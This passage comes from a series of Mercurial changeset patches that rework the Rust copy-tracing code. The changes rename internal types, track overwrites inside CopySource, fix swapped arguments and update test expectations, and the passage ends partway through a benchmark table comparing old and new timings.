is True if pick is a return of an ambiguity that needs resolution. """ major_tt, major_value = major minor_tt, minor_value = minor @@ -493,7 +505,7 @@ if major_tt == minor_tt: # if it comes from the same revision it must be the same value assert major_value == minor_value - return PICK_EITHER + return PICK_EITHER, False elif ( changes is not None and minor_value is not None @@ -502,7 +514,7 @@ ): # In this case, a deletion was reverted, the "alive" value overwrite # the deleted one. - return PICK_MINOR + return PICK_MINOR, True elif ( changes is not None and major_value is not None @@ -511,30 +523,30 @@ ): # In this case, a deletion was reverted, the "alive" value overwrite # the deleted one. - return PICK_MAJOR + return PICK_MAJOR, True elif isancestor(minor_tt, major_tt): if changes is not None and dest in changes.merged: # change to dest happened on the branch without copy-source change, # so both source are valid and "major" wins. - return PICK_MAJOR + return PICK_MAJOR, True else: - return PICK_MAJOR + return PICK_MAJOR, False elif isancestor(major_tt, minor_tt): if changes is not None and dest in changes.merged: # change to dest happened on the branch without copy-source change, # so both source are valid and "major" wins. - return PICK_MAJOR + return PICK_MAJOR, True else: - return PICK_MINOR + return PICK_MINOR, False elif minor_value is None: # in case of conflict, the "alive" side wins. - return PICK_MAJOR + return PICK_MAJOR, True elif major_value is None: # in case of conflict, the "alive" side wins. - return PICK_MINOR + return PICK_MINOR, True else: # in case of conflict where both side are alive, major wins. - return PICK_MAJOR + return PICK_MAJOR, True def _revinfo_getter_extra(repo): diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -568,20 +568,20 @@ // This closure exist as temporary help while multiple developper are // actively working on this code. Feel free to re-inline it once this // code is more settled. - let mut cmp_value = - |dest: &PathToken, - src_minor: &TimeStampedPathCopy, - src_major: &TimeStampedPathCopy| { - compare_value( - path_map, - current_merge, - changes, - oracle, - dest, - src_minor, - src_major, - ) - }; + let cmp_value = |oracle: &mut AncestorOracle<A>, + dest: &PathToken, + src_minor: &TimeStampedPathCopy, + src_major: &TimeStampedPathCopy| { + compare_value( + path_map, + current_merge, + changes, + oracle, + dest, + src_minor, + src_major, + ) + }; if minor.is_empty() { major } else if major.is_empty() { @@ -605,11 +605,30 @@ for (dest, src_minor) in minor { let src_major = major.get(&dest); match src_major { - None => major.insert(dest, src_minor), + None => { + major.insert(dest, src_minor); + } Some(src_major) => { - match cmp_value(&dest, &src_minor, src_major) { - MergePick::Any | MergePick::Major => None, - MergePick::Minor => major.insert(dest, src_minor), + let (pick, overwrite) = + cmp_value(oracle, &dest, &src_minor, src_major); + if overwrite { + oracle.record_overwrite(src_minor.rev, current_merge); + oracle.record_overwrite(src_major.rev, current_merge); + let path = match pick { + MergePick::Major => src_major.path, + MergePick::Minor => src_minor.path, + MergePick::Any => src_major.path, + }; + let src = TimeStampedPathCopy { + rev: current_merge, + path, + }; + major.insert(dest, src); + } else { + match pick { + MergePick::Any | MergePick::Major => None, + MergePick::Minor => major.insert(dest, src_minor), + }; } } }; @@ -621,11 +640,30 @@ for (dest, src_major) in major { let src_minor = minor.get(&dest); match src_minor { - None => minor.insert(dest, src_major), + None => { + minor.insert(dest, src_major); + } Some(src_minor) => { - match cmp_value(&dest, src_minor, &src_major) { - MergePick::Any | MergePick::Minor => None, - MergePick::Major => minor.insert(dest, src_major), + let (pick, overwrite) = + cmp_value(oracle, &dest, &src_major, src_minor); + if overwrite { + oracle.record_overwrite(src_minor.rev, current_merge); + oracle.record_overwrite(src_major.rev, current_merge); + let path = match pick { + MergePick::Major => src_minor.path, + MergePick::Minor => src_major.path, + MergePick::Any => src_major.path, + }; + let src = TimeStampedPathCopy { + rev: current_merge, + path, + }; + minor.insert(dest, src); + } else { + match pick { + MergePick::Any | MergePick::Major => None, + MergePick::Minor => minor.insert(dest, src_major), + }; } } }; @@ -663,12 +701,32 @@ DiffItem::Update { old, new } => { let (dest, src_major) = new; let (_, src_minor) = old; - match cmp_value(dest, src_minor, src_major) { - MergePick::Major => to_minor(dest, src_major), - MergePick::Minor => to_major(dest, src_minor), - // If the two entry are identical, no need to do - // anything (but diff should not have yield them) - MergePick::Any => unreachable!(), + let (pick, overwrite) = + cmp_value(oracle, dest, src_minor, src_major); + if overwrite { + oracle.record_overwrite(src_minor.rev, current_merge); + oracle.record_overwrite(src_major.rev, current_merge); + let path = match pick { + MergePick::Major => src_major.path, + MergePick::Minor => src_minor.path, + // If the two entry are identical, no need to do + // anything (but diff should not have yield them) + MergePick::Any => src_major.path, + }; + let src = TimeStampedPathCopy { + rev: current_merge, + path, + }; + to_minor(dest, &src); + to_major(dest, &src); + } else { + match pick { + MergePick::Major => to_minor(dest, src_major), + MergePick::Minor => to_major(dest, src_minor), + // If the two entry are identical, no need to do + // anything (but diff should not have yield them) + MergePick::Any => unreachable!(), + } } } }; @@ -717,39 +775,37 @@ dest: &PathToken, src_minor: &TimeStampedPathCopy, src_major: &TimeStampedPathCopy, -) -> MergePick { +) -> (MergePick, bool) { if src_major.rev == current_merge { if src_minor.rev == current_merge { if src_major.path.is_none() { // We cannot get different copy information for both p1 and p2 // from the same revision. Unless this was a // deletion - MergePick::Any + (MergePick::Any, false) } else { unreachable!(); } } else { // The last value comes the current merge, this value -will- win // eventually. - oracle.record_overwrite(src_minor.rev, src_major.rev); - MergePick::Major + (MergePick::Major, true) } } else if src_minor.rev == current_merge { // The last value comes the current merge, this value -will- win // eventually. - oracle.record_overwrite(src_major.rev, src_minor.rev); - MergePick::Minor + (MergePick::Minor, true) } else if src_major.path == src_minor.path { // we have the same value, but from other source; if src_major.rev == src_minor.rev { // If the two entry are identical, they are both valid - MergePick::Any + (MergePick::Any, false) } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { - MergePick::Minor + (MergePick::Minor, false) } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { - MergePick::Major + (MergePick::Major, false) } else { - MergePick::Major + (MergePick::Any, true) } } else if src_major.rev == src_minor.rev { // We cannot get copy information for both p1 and p2 in the @@ -766,7 +822,7 @@ { // If the file is "deleted" in the major side but was // salvaged by the merge, we keep the minor side alive - MergePick::Minor + (MergePick::Minor, true) } else if src_major.path.is_some() && src_minor.path.is_none() && action == MergeCase::Salvaged @@ -774,7 +830,7 @@ // If the file is "deleted" in the minor side but was // salvaged by the merge, unconditionnaly preserve the // major side. - MergePick::Major + (MergePick::Major, true) } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { // The information from the minor version are strictly older than // the major version @@ -784,10 +840,10 @@ // mean the older copy information are still relevant. // // The major side wins such conflict. - MergePick::Major + (MergePick::Major, true) } else { // No activity on the minor branch, pick the newer one. - MergePick::Major + (MergePick::Major, false) } } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { if action == MergeCase::Merged { @@ -796,20 +852,20 @@ // mean the older copy information are still relevant. // // The major side wins such conflict. - MergePick::Major + (MergePick::Major, true) } else { // No activity on the minor branch, pick the newer one. - MergePick::Minor + (MergePick::Minor, false) } } else if src_minor.path.is_none() { // the minor side has no relevant information, pick the alive one - MergePick::Major + (MergePick::Major, true) } else if src_major.path.is_none() { // the major side has no relevant information, pick the alive one - MergePick::Minor + (MergePick::Minor, true) } else { // by default the major side wins - MergePick::Major + (MergePick::Major, true) } } } diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -3182,10 +3182,8 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AEm")' f A f a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) - b (known-bad-output sidedata !) - b (known-bad-output upgraded !) + a (sidedata !) + a (upgraded !) The result from mEAm is the same for the subsequent merge: @@ -3205,10 +3203,8 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EAm")' f A f a (filelog !) - b (missing-correct-output sidedata !) - b (missing-correct-output upgraded !) - a (known-bad-output sidedata !) - a (known-bad-output upgraded !) + b (sidedata !) + b (upgraded !) Subcase: chaining conflicting rename resolution ``````````````````````````````````````````````` @@ -3235,10 +3231,8 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mT,PQm")' v A v r (filelog !) - p (missing-correct-output sidedata !) - p (missing-correct-output upgraded !) - r (known-bad-output sidedata !) - r (known-bad-output upgraded !) + p (sidedata !) + p (upgraded !) The result from mQPm is the same for the subsequent merge: @@ -3254,10 +3248,8 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mS,QPm")' v A v r (filelog !) - r (missing-correct-output sidedata !) - r (missing-correct-output upgraded !) - p (known-bad-output sidedata !) - p (known-bad-output upgraded !) + r (sidedata !) + r (upgraded !) Subcase: chaining salvage information during a merge @@ -3271,9 +3263,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-revert-m-0")' M b A d - a (filelog !) - a (sidedata !) - a (upgraded !) + a (no-changeset no-compatibility !) A t p R a @@ -3281,22 +3271,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")' M b A d - a (filelog !) - a (sidedata !) - a (upgraded !) + a (no-changeset no-compatibility !) A t p R a R p chained output - $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC+revert,Lm")' M b A d - a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) + a (no-changeset no-compatibility !) A t p A unrelated-l @@ -3305,9 +3290,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB+revert,Lm")' M b A d - a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) + a (no-changeset no-compatibility !) A t p A unrelated-l @@ -3316,9 +3299,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,BC+revertm")' M b A d - a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) + a (no-changeset no-compatibility !) A t p A unrelated-l @@ -3327,9 +3308,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,CB+revertm")' M b A d - a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) + a (no-changeset no-compatibility !) A t p A unrelated-l @@ -3373,18 +3352,10 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGF,Nm")' d A d - a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) - h (known-bad-output sidedata !) - h (known-bad-output upgraded !) + a (no-changeset no-compatibility !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mN,GFm")' d A d - a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) - h (known-bad-output sidedata !) - h (known-bad-output upgraded !) + a (no-changeset no-compatibility !) Subcase: chaining conflicting rename resolution, with extra change during the merge @@ -3411,11 +3382,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AE-change-m")' f A f - a (filelog !) - a (missing-correct-output sidedata !) - a (missing-correct-output upgraded !) - b (known-bad-output sidedata !) - b (known-bad-output upgraded !) + a (no-changeset no-compatibility !) The result from mEAm is the same for the subsequent merge: @@ -3435,7 +3402,5 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EA-change-m")' f A f a (filelog !) - b (missing-correct-output sidedata !) - b (missing-correct-output upgraded !) - a (known-bad-output sidedata !) - a (known-bad-output upgraded !) + b (sidedata !) + b (upgraded !) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608049560 -3600 # Tue Dec 15 17:26:00 2020 +0100 # Node ID 313610be4147847eda611772a020c0834c9db974 # Parent c19c662097e160402188091020386a456e5ebaa3 copies-rust: rename TimeStampedPathCopies to InternalPathCopies We are looking into moving away from TimeStampedPathCopy (that use is_ancestors call to detect overwrite) in favor of an approach that does not requires is_ancestors calls. Yet we will still need an internal representation that differs from the returned result. So we call it "InternalPathCopies" which is generic but clear. Differential Revision: https://phab.mercurial-scm.org/D9641 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -25,7 +25,7 @@ } /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) -type TimeStampedPathCopies = OrdMap<PathToken, TimeStampedPathCopy>; +type InternalPathCopies = OrdMap<PathToken, TimeStampedPathCopy>; /// hold parent 1, parent 2 and relevant files actions. pub type RevInfo<'a> = (Revision, Revision, ChangedFiles<'a>); @@ -382,7 +382,7 @@ // We will chain the copies information accumulated for the parent with // the individual copies information the curent revision. Creating a // new TimeStampedPath for each `rev` → `children` vertex. - let mut copies: Option<TimeStampedPathCopies> = None; + let mut copies: Option<InternalPathCopies> = None; if p1 != NULL_REVISION { // Retrieve data computed in a previous iteration let parent_copies = get_and_clean_parent_copies( @@ -471,21 +471,21 @@ /// /// If parent is not part of the set we are expected to walk, return None. fn get_and_clean_parent_copies( - all_copies: &mut HashMap<Revision, TimeStampedPathCopies>, + all_copies: &mut HashMap<Revision, InternalPathCopies>, children_count: &mut HashMap<Revision, usize>, parent_rev: Revision, -) -> Option<TimeStampedPathCopies> { +) -> Option<InternalPathCopies> { let count = children_count.get_mut(&parent_rev)?; *count -= 1; if *count == 0 { match all_copies.remove(&parent_rev) { Some(c) => Some(c), - None => Some(TimeStampedPathCopies::default()), + None => Some(InternalPathCopies::default()), } } else { match all_copies.get(&parent_rev) { Some(c) => Some(c.clone()), - None => Some(TimeStampedPathCopies::default()), + None => Some(InternalPathCopies::default()), } } } @@ -495,11 +495,11 @@ fn add_from_changes<A: Fn(Revision, Revision) -> bool>( path_map: &mut TwoWayPathMap, oracle: &mut AncestorOracle<A>, - base_copies: &TimeStampedPathCopies, + base_copies: &InternalPathCopies, changes: &ChangedFiles, parent: Parent, current_rev: Revision, -) -> TimeStampedPathCopies { +) -> InternalPathCopies { let mut copies = base_copies.clone(); for action in changes.iter_actions(parent) { match action { @@ -540,7 +540,7 @@ // // We need to explicitly record them as dropped to // propagate this information when merging two - // TimeStampedPathCopies object. + // InternalPathCopies object. let deleted = path_map.tokenize(deleted_path); copies.entry(deleted).and_modify(|old| { oracle.record_overwrite(old.rev, current_rev); @@ -560,11 +560,11 @@ fn merge_copies_dict<A: Fn(Revision, Revision) -> bool>( path_map: &TwoWayPathMap, current_merge: Revision, - mut minor: TimeStampedPathCopies, - mut major: TimeStampedPathCopies, + mut minor: InternalPathCopies, + mut major: InternalPathCopies, changes: &ChangedFiles, oracle: &mut AncestorOracle<A>, -) -> TimeStampedPathCopies { +) -> InternalPathCopies { // This closure exist as temporary help while multiple developper are // actively working on this code. Feel free to re-inline it once this // code is more settled. @@ -587,7 +587,7 @@ } else if major.is_empty() { minor } else if minor.len() * 2 < major.len() { - // Lets says we are merging two TimeStampedPathCopies instance A and B. + // Lets says we are merging two InternalPathCopies instance A and B. // // If A contains N items, the merge result will never contains more // than N values differents than the one in A @@ -601,7 +601,7 @@ // between A and B. // // This help performance a lot in case were a tiny - // TimeStampedPathCopies is merged with a much larger one. + // InternalPathCopies is merged with a much larger one. for (dest, src_minor) in minor { let src_major = major.get(&dest); match src_major { @@ -755,7 +755,7 @@ } /// represent the side that should prevail when merging two -/// TimeStampedPathCopies +/// InternalPathCopies enum MergePick { /// The "major" (p1) side prevails Major, # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608536550 -3600 # Mon Dec 21 08:42:30 2020 +0100 # Node ID 2bd069788367608b2f67273c5b3cdcc0b3f3ed6f # Parent 313610be4147847eda611772a020c0834c9db974 copies-rust: rename TimeStampedPathCopy to CopySource Same rational as the previous changesets. CopySource is a clear descriptive name that does not depends on an implementation details that we are about to the change. Differential Revision: https://phab.mercurial-scm.org/D9642 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -16,7 +16,7 @@ type PathToken = usize; #[derive(Clone, Debug, PartialEq, Copy)] -struct TimeStampedPathCopy { +struct CopySource { /// revision at which the copy information was added rev: Revision, /// the copy source, (Set to None in case of deletion of the associated @@ -25,7 +25,7 @@ } /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) -type InternalPathCopies = OrdMap<PathToken, TimeStampedPathCopy>; +type InternalPathCopies = OrdMap<PathToken, CopySource>; /// hold parent 1, parent 2 and relevant files actions. pub type RevInfo<'a> = (Revision, Revision, ChangedFiles<'a>); @@ -521,7 +521,7 @@ // information. See merge_copies_dict for details. match copies.entry(dest) { Entry::Vacant(slot) => { - let ttpc = TimeStampedPathCopy { + let ttpc = CopySource { rev: current_rev, path: entry, }; @@ -570,8 +570,8 @@ // code is more settled. let cmp_value = |oracle: &mut AncestorOracle<A>, dest: &PathToken, - src_minor: &TimeStampedPathCopy, - src_major: &TimeStampedPathCopy| { + src_minor: &CopySource, + src_major: &CopySource| { compare_value( path_map, current_merge, @@ -619,7 +619,7 @@ MergePick::Minor => src_minor.path, MergePick::Any => src_major.path, }; - let src = TimeStampedPathCopy { + let src = CopySource { rev: current_merge, path, }; @@ -654,7 +654,7 @@ MergePick::Minor => src_major.path, MergePick::Any => src_major.path, }; - let src = TimeStampedPathCopy { + let src = CopySource { rev: current_merge, path, }; @@ -673,10 +673,10 @@ let mut override_minor = Vec::new(); let mut override_major = Vec::new(); - let mut to_major = |k: &PathToken, v: &TimeStampedPathCopy| { + let mut to_major = |k: &PathToken, v: &CopySource| { override_major.push((k.clone(), v.clone())) }; - let mut to_minor = |k: &PathToken, v: &TimeStampedPathCopy| { + let mut to_minor = |k: &PathToken, v: &CopySource| { override_minor.push((k.clone(), v.clone())) }; @@ -713,7 +713,7 @@ // anything (but diff should not have yield them) MergePick::Any => src_major.path, }; - let src = TimeStampedPathCopy { + let src = CopySource { rev: current_merge, path, }; @@ -773,8 +773,8 @@ changes: &ChangedFiles, oracle: &mut AncestorOracle<A>, dest: &PathToken, - src_minor: &TimeStampedPathCopy, - src_major: &TimeStampedPathCopy, + src_minor: &CopySource, + src_major: &CopySource, ) -> (MergePick, bool) { if src_major.rev == current_merge { if src_minor.rev == current_merge { # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608689073 -3600 # Wed Dec 23 03:04:33 2020 +0100 # Node ID 3c5a8b13206a53b0a0e8b6138ab5ffdc18fa048a # Parent 2bd069788367608b2f67273c5b3cdcc0b3f3ed6f copies-rust: fix reverted argument when merging tiny minor or major The argument where not passed in the right other. This is not caught by the test (yet) because it is a sub case of a special case. Am I adding this to my list of things to test. Using test directly in Rust would be appropriate here. However we don't have the ability to test this code that way yet, and I am focussing on other part of that work right now. Differential Revision: https://phab.mercurial-scm.org/D9657 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -645,7 +645,7 @@ } Some(src_minor) => { let (pick, overwrite) = - cmp_value(oracle, &dest, &src_major, src_minor); + cmp_value(oracle, &dest, src_minor, &src_major); if overwrite { oracle.record_overwrite(src_minor.rev, current_merge); oracle.record_overwrite(src_major.rev, current_merge); @@ -661,8 +661,8 @@ minor.insert(dest, src); } else { match pick { - MergePick::Any | MergePick::Major => None, - MergePick::Minor => minor.insert(dest, src_major), + MergePick::Any | MergePick::Minor => None, + MergePick::Major => minor.insert(dest, src_major), }; } } # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608689083 -3600 # Wed Dec 23 03:04:43 2020 +0100 # Node ID b6f65d90e8af3aabed7e85304d6ffa3d2dda485b # Parent 3c5a8b13206a53b0a0e8b6138ab5ffdc18fa048a copies-rust: add methods to build and update CopySource Having explicit method with clear semantic help to clarify the code and prepare an update to the underlying documentation without too much disruption. Differential Revision: https://phab.mercurial-scm.org/D9643 diff --git a/rust/hg-core/src/copy_tracing.rs b/rust/hg-core/src/copy_tracing.rs --- a/rust/hg-core/src/copy_tracing.rs +++ b/rust/hg-core/src/copy_tracing.rs @@ -15,7 +15,7 @@ type PathToken = usize; -#[derive(Clone, Debug, PartialEq, Copy)] +#[derive(Clone, Debug, PartialEq)] struct CopySource { /// revision at which the copy information was added rev: Revision, @@ -24,6 +24,42 @@ path: Option<PathToken>, } +impl CopySource { + /// create a new CopySource + /// + /// Use this when no previous copy source existed. + fn new(rev: Revision, path: Option<PathToken>) -> Self { + Self { rev, path } + } + + /// create a new CopySource from merging two others + /// + /// Use this when merging two InternalPathCopies requires active merging of + /// some entries. + fn new_from_merge(rev: Revision, winner: &Self, loser: &Self) -> Self { + Self { + rev, + path: winner.path, + } + } + + /// Update the value of a pre-existing CopySource + /// + /// Use this when recording copy information from parent → child edges + fn overwrite(&mut self, rev: Revision, path: Option<PathToken>) { + self.rev = rev; + self.path = path; + } + + /// Mark pre-existing copy information as "dropped" by a file deletion + /// + /// Use this when recording copy information from parent → child edges + fn mark_delete(&mut self, rev: Revision) { + self.rev = rev; + self.path = None; + } +} + /// maps CopyDestination to Copy Source (+ a "timestamp" for the operation) type InternalPathCopies = OrdMap<PathToken, CopySource>; @@ -521,17 +557,13 @@ // information. See merge_copies_dict for details. match copies.entry(dest) { Entry::Vacant(slot) => { - let ttpc = CopySource { - rev: current_rev, - path: entry, - }; + let ttpc = CopySource::new(current_rev, entry); slot.insert(ttpc); } Entry::Occupied(mut slot) => { - let mut ttpc = slot.get_mut(); + let ttpc = slot.get_mut(); oracle.record_overwrite(ttpc.rev, current_rev); - ttpc.rev = current_rev; - ttpc.path = entry; + ttpc.overwrite(current_rev, entry); } } } @@ -544,8 +576,7 @@ let deleted = path_map.tokenize(deleted_path); copies.entry(deleted).and_modify(|old| { oracle.record_overwrite(old.rev, current_rev); - old.rev = current_rev; - old.path = None; + old.mark_delete(current_rev); }); } } @@ -614,14 +645,22 @@ if overwrite { oracle.record_overwrite(src_minor.rev, current_merge); oracle.record_overwrite(src_major.rev, current_merge); - let path = match pick { - MergePick::Major => src_major.path, - MergePick::Minor => src_minor.path, - MergePick::Any => src_major.path, - }; - let src = CopySource { - rev: current_merge, - path, + let src = match pick { + MergePick::Major => CopySource::new_from_merge( + current_merge, + src_major, + &src_minor, + ), + MergePick::Minor => CopySource::new_from_merge( + current_merge, + &src_minor, + src_major, + ), + MergePick::Any => CopySource::new_from_merge( + current_merge, + src_major, + &src_minor, + ), }; major.insert(dest, src); } else { @@ -649,14 +688,22 @@ if overwrite { oracle.record_overwrite(src_minor.rev, current_merge); oracle.record_overwrite(src_major.rev, current_merge); - let path = match pick { - MergePick::Major => src_minor.path, - MergePick::Minor => src_major.path, - MergePick::Any => src_major.path, - }; - let src = CopySource { - rev: current_merge, - path, + let src = match pick { + MergePick::Major => CopySource::new_from_merge( + current_merge, + &src_major, + src_minor, + ), + MergePick::Minor => CopySource::new_from_merge( + current_merge, + src_minor, + &src_major, + ), + MergePick::Any => CopySource::new_from_merge( + current_merge, + &src_major, + src_minor, + ), }; minor.insert(dest, src); } else { @@ -706,16 +753,22 @@ if overwrite { oracle.record_overwrite(src_minor.rev, current_merge); oracle.record_overwrite(src_major.rev, current_merge); - let path = match pick { - MergePick::Major => src_major.path, - MergePick::Minor => src_minor.path, - // If the two entry are identical, no need to do - // anything (but diff should not have yield them) - MergePick::Any => src_major.path, - }; - let src = CopySource { - rev: current_merge, - path, + let src = match pick { + MergePick::Major => CopySource::new_from_merge( + current_merge, + src_major, + src_minor, + ), + MergePick::Minor => CopySource::new_from_merge( + current_merge, + src_minor, + src_major, + ), + MergePick::Any => CopySource::new_from_merge( + current_merge, + src_major, + src_minor, + ), }; to_minor(dest, &src); to_major(dest, &src); # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1608051863 -3600 # Tue Dec 15 18:04:23 2020 +0100 # Node ID 0d840b9d200d3de5d9ee6ef5eddd2b0b0cee6743 # Parent b6f65d90e8af3aabed7e85304d6ffa3d2dda485b copies-rust: track "overwrites" directly within CopySource Overwrite are "rare enough" that explicitly keeping track of them is going to be "cheap", or at least much cheaper that issuing many `is_ancestor` calls. Even a simple implementation using no specific optimisation (eg: using the generic HashSet type) yield good result in most cases. They are interesting optimization to can do on top of that. We will implement them in later changesets. We tried different approach to speed up the overwrite detection and this one seems the most promising. Without further optimization, we already see sizable speedup on various cases. Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mozilla-try x00000_revs_x_added_0_copies 6a320851d377 1ebb79acd503 : 363753 revs, 5.138169 s, 4.482399 s, -0.655770 s, × 0.8724, 12 µs/rev mozilla-try x00000_revs_x_added_x_copies 5173c4b6f97c 95d83ee7242d : 362229 revs, 5.127809 s, 4.480366 s, -0.647443 s, × 0.8737, 12 µs/rev mozilla-try x00000_revs_x000_added_x_copies 9126823d0e9c ca82787bb23c : 359344 revs, 4.971136 s, 4.369070 s, -0.602066 s, × 0.8789, 12 µs/rev mozilla-try x00000_revs_x0000_added_x0000_copies 8d3fafa80d4b eb884023b810 : 192665 revs, 1.741678 s, 1.592506 s, -0.149172 s, × 0.9144, 8 µs/rev However, some of the case doing a lot of overwrite get significantly slower. The one with a really problematic slowdown are the special "head reducing" merge in mozilla-try so I am not too worried about them. In addition, further changeset are going to improve the performance of all this. Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mozilla-try x0000_revs_xx000_added_x000_copies 89294cd501d9 7ccb2fc7ccb5 : 97052 revs, 1.343373 s, 2.119204 s, +0.775831 s, × 1.5775, 21 µs/rev mozilla-try x00000_revs_x00000_added_x0000_copies 1b661134e2ca 1ae03d022d6d : 228985 revs, 40.314822 s, 87.824489 s, +47.509667 s, × 2.1785, 383 µs/rev mozilla-try x00000_revs_x00000_added_x000_copies 9b2a99adc05e 8e29777b48e6 : 382065 revs, 20.048029 s, 43.304637 s, +23.256608 s, × 2.1600, 113 µs/rev Full benchmark below: Repo Case Source-Rev Dest-Rev # of revisions old time new time Difference Factor time per rev --------------------------------------------------------------------------------------------------------------------------------------------------------------- mercurial x_revs_x_added_0_copies ad6b123de1c7 39cfcef4f463 : 1 revs, 0.000042 s, 0.000043 s, +0.000001 s, × 1.0238, 43 µs/rev mercurial x_revs_x_added_x_copies 2b1c78674230 0c1d10351869 : 6 revs, 0.000110 s, 0.000114 s, +0.000004 s, × 1.0364, 19 µs/rev mercurial x000_revs_x000_added_x_copies 81f8ff2a9bf2 dd3267698d84 : 1032 revs, 0.004945 s, 0.004937 s, -0.000008 s, × 0.9984, 4 µs/rev pypy x_revs_x_added_0_copies aed021ee8ae8 099ed31b181b : 9 revs, 0.000192 s, 0.000339 s, +0.000147 s, × 1.7656, 37 µs/rev pypy x_revs_x000_added_0_copies 4aa4e1f8e19a 359343b9ac0e : 1 revs, 0.000049 s, 0.000049 s, +0.000000 s, × 1.0000, 49 µs/rev pypy x_revs_x_added_x_copies ac52eb7bbbb0 72e022663155 : 7 revs, 0.000112 s, 0.000202 s, +0.000090 s, × 1.8036, 28 µs/rev pypy x_revs_x00_added_x_copies c3b14617fbd7 ace7255d9a26 : 1 revs, 0.000323 s, 0.000409 s, +0.000086 s, × 1.2663, 409 µs/rev pypy x_revs_x000_added_x000_copies df6f7a526b60 a83dc6a2d56f : 6 revs, 0.010042 s, 0.011984 s, +0.001942 s, × 1.1934, 1997 µs/rev pypy x000_revs_xx00_added_0_copies 89a76aede314 2f22446ff07e : 4785 revs, 0.049813 s, 0.050820 s, +0.001007 s, × 1.0202, 10 µs/rev pypy x000_revs_x000_added_x_copies 8a3b5bfd266e 2c68e87c3efe : 6780 revs, 0.079937 s, 0.087953 s, +0.008016 s, × 1.1003, 12 µs/rev pypy x000_revs_x000_added_x000_copies 89a76aede314 7b3dda341c84 : 5441 revs, 0.059412 s, 0.062902 s, +0.003490 s, × 1.0587, 11 µs/rev pypy x0000_revs_x_added_0_copies d1defd0dc478 c9cb1334cc78 : 43645 revs, 0.533769 s, 0.679234 s, +0.145465 s, × 1.2725, 15 µs/rev pypy x0000_revs_xx000_added_0_copies bf2c629d0071 4ffed77c095c : 2 revs, 0.013147 s, 0.013095 s, -0.000052 s, × 0.9960, 6547 µs/rev pypy x0000_revs_xx000_added_x000_copies 08ea3258278e d9fa043f30c0 : 11316 revs, 0.110680 s, 0.120910 s, +0.010230 s, × 1.0924, 10 µs/rev netbeans x_revs_x_added_0_copies fb0955ffcbcd a01e9239f9e7 : 2 revs, 0.000085 s, 0.000087 s, +0.000002 s, × 1.0235, 43 µs/rev netbeans x_revs_x000_added_0_copies 6f360122949f 20eb231cc7d0 : 2 revs, 0.000107 s, 0.000107 s, +0.000000 s, × 1.0000, 53 µs/rev netbeans x_revs_x_added_x_copies 1ada3faf6fb6 5a39d12eecf4 : 3 revs, 0.000175 s, 0.000186 s, +0.000011 s, × 1.0629, 62 µs/rev netbeans x_revs_x00_added_x_copies 35be93ba1e2c 9eec5e90c05f : 9 revs, 0.000720 s, 0.000754 s, +0.000034 s, × 1.0472, 83 µs/rev netbeans x000_revs_xx00_added_0_copies eac3045b4fdd 51d4ae7f1290 : 1421 revs, 0.010019 s, 0.010443 s, +0.000424 s, × 1.0423, 7 µs/rev netbeans x000_revs_x000_added_x_copies e2063d266acd 6081d72689dc : 1533 revs, 0.015602 s, 0.015697 s, +0.000095 s, × 1.0061, 10 µs/rev netbeans x000_revs_x000_added_x000_copies ff453e9fee32 411350406ec2 : 5750 revs, 0.058759 s, 0.063528 s, +0.004769 s, × 1.0812, 11 µs/rev netbeans x0000_revs_xx000_added_x000_copies 588c2d1ced70 1aad62e59ddd : 66949 revs, 0.491550 s, 0.545515 s, +0.053965 s, 